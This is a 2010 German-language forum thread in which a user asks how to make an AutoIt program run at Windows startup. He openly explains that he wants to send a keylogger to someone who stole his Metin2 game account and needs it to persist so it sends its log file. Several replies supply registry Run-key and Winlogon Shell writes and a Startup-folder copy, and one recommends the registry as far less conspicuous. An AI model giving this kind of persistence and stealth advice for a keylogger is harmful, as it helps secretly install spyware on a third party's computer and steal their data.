autoit autostart

11/25/2010 19:06 szmast3r#1
hallo,,

ich wollte fragen wie es geht autoit in autostart zu bekommen( auf alle windows betriebssysteme nicht nur auf win7 oder so)

habe schon mehrere sachen probiert

iwie geht das nie

REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe,"&Systemdir&"\system.exe")

soweit bin ich gekommen aber da steht immer eine fehlermeldung....
weiss einer weiter??
11/25/2010 19:25 }{exer#2
Kopier mal die Scrite.exe in den Autostart Ordner
11/25/2010 19:27 maxi39#3
Für deinen script : REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptDir)

€ich steh grad aufm schlauch. sag ma genau auser, ich will autoit starten, was du starten willst
11/25/2010 20:39 szmast3r#4
Quote:
Originally Posted by maxi39 View Post
Für deinen script : REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptDir)

€ich steh grad aufm schlauch. sag ma genau auser, ich will autoit starten, was du starten willst
also mir wurde mein mt2 acc geklaut... metin support kann nix machen und jez will ich den typ ein keylogger schicken um mein acc wiederzubekommen...

aber damit der die daten (log.txt) absendet muss es nocheinmal gestartet werden... und wer is so blöd und startet es 2 mal....

desswegen soll es gleich in den autostart flutschen...

eine frage mit deinem : REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptDir)

kopiert der das in den autostart oder verschiebt der das in den autostart...
weil es hat gefunzt aber es war immernoch da wo es vorher war...
11/25/2010 20:52 PenGuin :O#5
FileCopy(@ScriptFullPath, @StartupDir)

oder willst du es unbedingt in Registry machen?
11/25/2010 20:58 szmast3r#6
Quote:
Originally Posted by pinguin94 View Post
FileCopy(@ScriptFullPath, @StartupDir)

oder willst du es unbedingt in Registry machen?
ich weiss es nicht... registry wäre besser....
ich habe jetzt

REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptDir)

benutzt

es sieht nur so aus als wenn es sich nur öffnen würde nicht verschieben würde...

oder kopiert der das mit diesem befehl nur?
11/25/2010 21:00 PenGuin :O#7
Probier mal:

REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptFullPath)
11/25/2010 21:03 szmast3r#8
Quote:
Originally Posted by pinguin94 View Post
Probier mal:

REGWRITE("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run\", "Shell", "REG_SZ", @ScriptFullPath)
wird das dann dahin kopiert oder verschoben??
11/25/2010 22:14 maxi39#9
Quote:
Originally Posted by szmast3r View Post
wird das dann dahin kopiert oder verschoben??
es wird nur ein eintrag gemacht, das bei dem neustart des pc das program auf diesem pfad aufgerufen wird
11/26/2010 07:34 Kamyshin#10
allgemein würd ich auch eher regwrite machen und des zeug nich in den Autostart verschieben. Is ca 100 mal unauffälliger.
Bei mir funzt der immer ganz gut
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run